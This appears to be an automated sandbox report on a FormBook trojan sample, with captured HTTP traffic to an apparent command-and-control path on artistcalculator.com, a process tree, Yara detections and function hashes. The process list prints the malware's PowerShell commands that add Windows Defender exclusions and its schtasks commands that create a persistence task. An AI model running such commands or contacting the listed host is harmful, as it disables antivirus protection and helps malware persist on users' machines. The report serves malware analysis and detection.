Jul 27, 2024 08:08:52.945883989 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:08:52 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 1226 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d ae 7f 05 ab 62 7d 18 46 cb 49 da 61 70 64 07 59 36 6c 03 f6 51 20 1b 8a 3d 05 14 79 6d b1 a1 78 39 92 8a ec 0e fd ef bb 94 28 c7 69 da 01 6d 05 03 96 ee e7 b9 e7 9c ea e9 0f 7f 5c fd f9 f7 ab 1f 59 13 5b b3 9e 55 e9 8f 19 61 b7 ab 02 2c ff eb ba 58 cf 9e 54 0d 08 45 ff 4f aa 16 a2 60 56 b4 b0 2a ee 34 f4 0e 7d 2c 98 44 1b c1 c6 55 d1 6b 15 9b 95 82 3b 2d 81 0f 1f c5 fb 5d 1e 6b 8c e1 a8 c7 a2 b6 0a 76 df 30 8b 1b 34 06 fb 82 95 43 53 d4 d1 c0 fa d2 47 1d 22 bb 12 46 76 46 44 f4 ec 79 ab 44 68 ce d9 15 b6 da 6e d9 35 a2 ad ca b1 38 b5 05 e9 b5 8b 2c 78 b9 2a 9a 18 dd b2 2c c5 30 43 1e 46 cc 25 b6 65 ef b8 b6 d2 74 0a 42 f9 86 7e ff 74 e0 f7 f9 6f fe 26 14 eb aa 1c 47 8d 53 e3 de 00 8b 7b 47 27 44 d8 c5 52 06 2a f9 9a fd 3b 63 f4 d4 b8 e3 41 bf 25 38 4b 7a f7 0a 3c a7 d0 f9 90 e3 2d be e5 ff 5b d0 43 7d ab e3 47 6b de cd 66 35 aa fd b4 4a c8 db ad c7 ce 2a 2e d1 a0 5f b2 be d1 11 c6 51 39 52 1b 2a 1a 23 78 07 7e 43 a4 f2 dd 92 35 5a 29 b0 63 bc 15 [TRUNCATED] Data Ascii: R]o6}b}FIapdY6lQ =ymx9(im\Y[Ua,XTEO`V4},DUk;-]kv04CSG"FvFDyDhn58,x,0CF%etB~to&GS{G'DR;cA%8Kz<-[C}Gkf5J._Q9R#x~C5Z)c~-z/\^ ZN#d$?(%t!g1:m(~X5y,J?%WcNwb ['vm Y2F;PY=3Myh@#u+d-LX@dF([>r?F[i4I#$'/(g_,&>RAcxD&9;?W Q#vBVX:3TvR@<Z3iR&6ypB^QEo!.}vCX"nphbUe)JF%e$em:h02dSbz\pq:VQSRiXm44zUd$E>I
Jul 27, 2024 08:08:52.945899010 CEST	431	IN	Data Raw: ee c8 d9 d0 d5 41 7a ed 92 06 37 bd 56 5b 38 54 56 cd c9 fa 6a 80 c3 ae 09 ce 53 5a 7d 72 48 9d ae 2f d9 ef d0 b3 d7 74 ce ab 74 0e bb 26 e2 a9 e4 34 97 b0 bc ae 72 f7 40 d2 ac 74 d9 4d 22 36 14 eb 4a 1c 91 19 88 cd be ef e7 13 53 03 93 64 f6 6d Data Ascii: Az7V[8TVjSZ}rH/tt&4r@tM"6JSdm`O mImb6bO~x1's;m8q.+JTu#Z}Wb]d+Z(-<_to{3OA^H24,L=bA#zch

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	62435	162.241.216.26	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:54.926457882 CEST	1805	OUT	POST /pf6m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.artistcalculator.com Origin: http://www.artistcalculator.com Referer: http://www.artistcalculator.com/pf6m/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 57 68 65 44 51 31 38 4e 5a 31 69 63 41 30 32 68 6e 5a 5a 54 45 31 67 7a 79 55 62 51 2f 68 45 61 38 6a 6c 75 54 2f 41 62 67 55 46 49 45 74 79 31 42 69 4a 36 37 56 74 70 51 4b 53 30 6b 4c 68 67 55 62 7a 49 57 48 50 2b 6e 4f 36 4f 4f 52 67 2b 74 50 50 32 65 55 55 6e 62 71 53 34 34 2b 54 51 65 34 78 45 53 50 53 37 6c 6b 4c 71 7a 38 48 4d 63 4a 57 57 56 49 43 52 62 57 48 6d 6e 52 49 53 78 72 33 46 44 5a 77 51 70 67 50 67 32 6e 50 57 6e 6e 2f 53 50 56 6a 69 46 4d 78 58 35 61 64 2f 65 54 7a 33 46 54 43 62 75 4f 35 4e 59 75 79 54 64 72 75 4a 45 48 68 73 4a 39 4b 56 4b 47 36 72 33 4a 62 72 73 32 6a 6e 47 51 51 38 6a 2b 78 75 6a 30 47 4a 76 71 64 52 68 67 32 61 78 77 6a 54 72 62 59 75 62 62 4d 50 7a 62 2b 32 4a 73 46 6a 2f 55 4f 4f 2f 7a 58 43 67 6c 63 37 50 34 47 4b 6c 37 6a 31 52 5a 66 57 64 45 47 79 31 65 71 6c 31 55 62 42 69 6e 33 4b 56 76 6e 47 47 55 6e 54 4b 44 42 71 68 30 33 34 54 2f 53 41 37 33 62 42 47 74 35 2f 6b 56 49 33 2f 77 6c 76 61 58 73 41 78 51 68 66 52 73 35 6a 57 4f 4e 37 51 [TRUNCATED] Data Ascii: 9Fjx=WheDQ18NZ1icA02hnZZTE1gzyUbQ/hEa8jluT/AbgUFIEty1BiJ67VtpQKS0kLhgUbzIWHP+nO6OORg+tPP2eUUnbqS44+TQe4xESPS7lkLqz8HMcJWWVICRbWHmnRISxr3FDZwQpgPg2nPWnn/SPVjiFMxX5ad/eTz3FTCbuO5NYuyTdruJEHhsJ9KVKG6r3Jbrs2jnGQQ8j+xuj0GJvqdRhg2axwjTrbYubbMPzb+2JsFj/UOO/zXCglc7P4GKl7j1RZfWdEGy1eql1UbBin3KVvnGGUnTKDBqh034T/SA73bBGt5/kVI3/wlvaXsAxQhfRs5jWON7QBwio0uyp545AOp0itdkz38lr6hsgtgzUfQVc7VfbGQjuD/fehxWU6F80+pEypnN4bc8uIfzFt/yryZtE8MCFgeh1xLMT8HfIBujzmFi/tAFFnle/GXShCc9uzVn3fPe7qcYIoVn8HsEp+fvuWzGP/mYaQg2NitcAafKF0bqqAnYRiPqogN8bb8tOoUyi6MEqkAyylhm2NfbbJ36+1Gh+HP2+5tLwADbh5BmXBEc0rTR7yiEy3dLvsjPqGXm7dfUavx4Cy9Jr2j9gtOmlxavhR0gufNF7pxgqF3QmqEniyK56ToPLaHxZnaohYQdkW8OiJ9AmdgRA16G1LGtlkEXr6ebdGOXFQAERShsarwQBX+ZD0uvrjGXe/dgv+KpQx6ew/zygfEnq5iCbVufpY+5MTtuh20TvKqhzF4iNpSq4zhGkNfOlNv87xj6VAFSbvLUJdVL/nBp57nYepq9yWAjE1XE7LB1fJA0hJ4CSlvEJGLvQ04nQzqM7XZMbxrmEGea+umLMJznk58wATRuITa/4cjdZEnaajbf+tyftDDb1CUkXHxXRA6Oe/nDMVq1cDucHyUJddV3ofvo0iqyq0Hau2AsYB/VDwefCA/PWHlJgUzqPXFLKBdKiEKaU2LEZ9/24cWAKXGFuvD3+k8aGDP0NTep8GTOccS9BFB [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.6	62436	162.241.216.26	80

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:58.428782940 CEST	492	OUT	GET /pf6m/?9Fjx=bj2jTCh2dAa0W37Ors9MIV8y6VuL4TB52i9XdK5qnE1eDYGuKlwknV9AdIGtnY1bTK6+aXD2gMPFTRYJsf/RVFQwT4yLxuuIQKRkes7NkFHq0brUctiaXa3KGHH0n3cgm+LnNOk=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.artistcalculator.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:08:59.190845966 CEST	636	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 27 Jul 2024 06:08:59 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://artistcalculator.com/pf6m/?9Fjx=bj2jTCh2dAa0W37Ors9MIV8y6VuL4TB52i9XdK5qnE1eDYGuKlwknV9AdIGtnY1bTK6+aXD2gMPFTRYJsf/RVFQwT4yLxuuIQKRkes7NkFHq0brUctiaXa3KGHH0n3cgm+LnNOk=&h20PB=Ilr0H host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS

Target ID:	0
Start time:	02:04:49
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\8SxJ9aYfJ1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Imagebase:	0x3c0000
File size:	734'728 bytes
MD5 hash:	E8B4997FD647C6236E8D6A5460724CEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:04:51
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Imagebase:	0xae0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:04:51
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:04:51
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"
Imagebase:	0xae0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:04:51
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:04:51
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp"
Imagebase:	0xf90000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:04:51
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:04:52
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\8SxJ9aYfJ1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Imagebase:	0x310000
File size:	734'728 bytes
MD5 hash:	E8B4997FD647C6236E8D6A5460724CEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:04:52
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\8SxJ9aYfJ1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Imagebase:	0xa20000
File size:	734'728 bytes
MD5 hash:	E8B4997FD647C6236E8D6A5460724CEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:04:52
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe
Imagebase:	0x500000
File size:	734'728 bytes
MD5 hash:	E8B4997FD647C6236E8D6A5460724CEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:04:54
Start date:	27/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:04:57
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp"
Imagebase:	0xf90000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:04:57
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:04:57
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"
Imagebase:	0x5a0000
File size:	734'728 bytes
MD5 hash:	E8B4997FD647C6236E8D6A5460724CEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:05:14
Start date:	27/07/2024
Path:	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe"
Imagebase:	0x160000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	02:05:15
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\findstr.exe"
Imagebase:	0xf40000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	02:05:26
Start date:	27/07/2024
Path:	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe"
Imagebase:	0x160000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	02:05:32
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\findstr.exe"
Imagebase:	0xf40000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:05:37
Start date:	27/07/2024
Path:	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe"
Imagebase:	0x160000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	02:05:52
Start date:	27/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	250
Total number of Limit Nodes:	11

Executed Functions

Function 073E4560 Relevance: 2.6, Instructions: 2603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91073a2ba33ae392343c04737e1e390e7663d3b923eea5f24e62e8953c922124
Instruction ID: 30d91ceeff3de0dd9f69b38a8130687b682302117d49e1cb5c519ba16e62345b
Opcode Fuzzy Hash: 91073a2ba33ae392343c04737e1e390e7663d3b923eea5f24e62e8953c922124
Instruction Fuzzy Hash: 1343FDB4A01229CFDB24DF68C888A9DB7B6BF49314F1581D5E419AB3A5CB34ED81CF50

Function 073E37F8 Relevance: .7, Instructions: 724COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c94e6b2bff3a536c5258fa08d175555a3f86c18864b525d557d34282a3ff466
Instruction ID: 89515b3727d4e8e567ad5d5de3189b91db5da9ee3db9174211af4a92ecea5052
Opcode Fuzzy Hash: 0c94e6b2bff3a536c5258fa08d175555a3f86c18864b525d557d34282a3ff466
Instruction Fuzzy Hash: 985273B1B00125DFEB14DF69D894A6EBBB6FF89310B158169E809DB3A1CB31DC41CB91

Function 06A7B108 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27356b34e4b37175c6ae9cd868db1c2a7eacce655bd1fb51ca77a495eac92fad
Instruction ID: 3bc786f71a083a3819c40d0dba6bcba269a66314eedd84852e853113fc79462c
Opcode Fuzzy Hash: 27356b34e4b37175c6ae9cd868db1c2a7eacce655bd1fb51ca77a495eac92fad
Instruction Fuzzy Hash: D8E04FB880E385DFD741FF649C605B8FBB97B0B204F0522D5C4099B2A3D7204D44CB55

Function 06A7B88E Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c139666c8d64201d17a6ead0074335bccae54732a61e84c0416f9327f338b4
Instruction ID: ebcc051a23f2e5f4d47782ee7a24780e24c0147204e5c4da2a8bad5bd23671b3
Opcode Fuzzy Hash: 98c139666c8d64201d17a6ead0074335bccae54732a61e84c0416f9327f338b4
Instruction Fuzzy Hash: 40D067B4D5E504CFD7D1BF6998682B8B6B8BB1A205F0520A5980ED7216D7348A40CB65

Function 025E4544 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

y, xrefs: 025E450D
y, xrefs: 025E456D
y, xrefs: 025E459D

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: y$y$y
API String ID: 0-2661365291
Opcode ID: 2818d440208c56aa05aea96498c048e364b2ff9267650717569fbdb12c2e8f6f
Instruction ID: 4f316b838ddd65a9d37f4ec76d561004b839e27ffbe3dbf37d73db6025c0ab40
Opcode Fuzzy Hash: 2818d440208c56aa05aea96498c048e364b2ff9267650717569fbdb12c2e8f6f
Instruction Fuzzy Hash: 7461CEB1D042A9DBDF29CFA8C4547DEBBF4BF4A348F14409AD44AAB206D7319805CF14

Function 025ED3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 025ED456
GetCurrentThread.KERNEL32 ref: 025ED493
GetCurrentProcess.KERNEL32 ref: 025ED4D0
GetCurrentThreadId.KERNEL32 ref: 025ED529

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f6c5acd6ea154f3a10c3a0beae1ee616a23fe1f1a891168b23d3e9c281198f1f
Instruction ID: 357f68951442d68e33f78526562eca04236715a68d95b1c66c77ba802d530e2b
Opcode Fuzzy Hash: f6c5acd6ea154f3a10c3a0beae1ee616a23fe1f1a891168b23d3e9c281198f1f
Instruction Fuzzy Hash: E75156B0901309DFEB58CFAAD548BEEBBF5BF88304F208459D419A7350D7746944CB6A

Function 025ED3D7 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 025ED456
